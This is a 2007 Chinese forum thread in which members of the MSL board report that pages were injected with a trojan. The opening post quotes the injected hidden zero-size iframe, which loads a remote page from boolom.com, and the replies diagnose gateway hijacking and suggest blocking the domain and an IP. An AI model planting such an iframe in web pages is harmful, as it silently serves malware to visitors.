Board logo

标题: 注意下,这里被人挂马了,谁能联系的到管理员? [打印本页]

作者: slks    时间: 2007-5-29 02:57     标题: 注意下,这里被人挂马了,谁能联系的到管理员?

请尽快通知下处理掉
在打开页面的时候有一定几率在源代码中被插入这一行<iframe src=http://boolom.com/ax.htm?7126?003 width=0 height=0 frameborder=0></iframe
作者: 紫炎    时间: 2007-5-29 09:22

检查了一下所有文件的修改日期,都没有异常,论坛自带的文件校验功能也测试了一遍,确定文件没有被改动过。楼主可能是自己的电脑中了问题,或者是浏览器被电信之类的流氓所劫持。
作者: 中尉    时间: 2007-5-29 10:34

也有人和我说MSL被挂蠕虫的……
作者: Friday    时间: 2007-5-29 10:36     标题: 前天貌似是集体RP大爆发的日子


作者: kencjj    时间: 2007-5-29 10:43

没发现,什么时间段的事情?
作者: Ramba    时间: 2007-5-29 10:48

打开主页有木马。。。。。。。。
作者: hitomi    时间: 2007-5-29 11:03

蠕虫.的确弹出N个提示tmp什么的
作者: Akatsuki    时间: 2007-5-29 11:17



QUOTE:
原帖由 hitomi 于 2007-5-29 11:03 发表
蠕虫.的确弹出N个提示tmp什么的

马甲虫>Trojan.DL.JS.Agent.ldc+Worm.Viking.gv.40448+???...
作者: slks    时间: 2007-5-29 11:21

回紫炎大,这个问题不是出在我们访问者身上,也不是服务器上,是和MSL服务器同一网段的某一台服务器的问题,估计那台机器中了什么,劫持网关,数据途经网关的时候就被挂了马,当然也有可能是恶意的.
这个要解决需要管理员去联系IDC服务商共同解决,要么只能等他自动平息,话说我以前管的机器里面经常碰到这样的情况,漕宝机房起码就有2起.


P.S.在没完全解决之前,可以手动预防下,在Internet选项->安全->受限制的站点里面添加上http://*.boolom.com/和222.215.152.83这两个地址,避免有问题的文件传到本机上来
作者: 紫炎    时间: 2007-5-29 11:33

原来如此,又长见识了

难怪很长一段时间来我打开MSL的时候经常会随机被马桶拦截掉一个窗口,一直还以为是被电信劫持了,现在想想应该也是你说的这个问题了,因为我打开其它网站的时候就从来没弹出过那个拦截提示
作者: Hikaru    时间: 2007-5-29 13:30



QUOTE:
原帖由 slks 于 2007-5-29 11:21 发表
回紫炎大,这个问题不是出在我们访问者身上,也不是服务器上,是和MSL服务器同一网段的某一台服务器的问题,估计那台机器中了什么,劫持网关,数据途经网关的时候就被挂了马,当然也有可能是恶意的.
这个要解决需要管理员去 ...

我敢说是这样的,今天的状况让我万分OTL

漕宝真是挺破的,考虑换地..............
作者: 逆天小队长    时间: 2007-5-29 15:49

我的是该页无法显示,问人人都不知道。
作者: clover4    时间: 2007-5-29 16:53



QUOTE:
原帖由 Hikaru 于 2007-5-29 13:30 发表

我敢说是这样的,今天的状况让我万分OTL

漕宝真是挺破的,考虑换地..............

钱……时间…………ORZ……
作者: heeroyuy    时间: 2007-5-29 21:35

我们公司服务器放在更里面的机房,还不是四面楚歌?
作者: 0080    时间: 2007-9-22 10:42

好像又有马了,一开论坛就报警啊!
作者: 中尉    时间: 2007-9-22 20:53

今天中了那啥,威金之类的,难道和MSL有关么
作者: Duo_Maxwell    时间: 2007-9-25 16:22

中就中吧,裸奔者路过




欢迎光临 机动战士联盟MSL (http://bbs.cnmsl.net/) Powered by Discuz! 5.5.0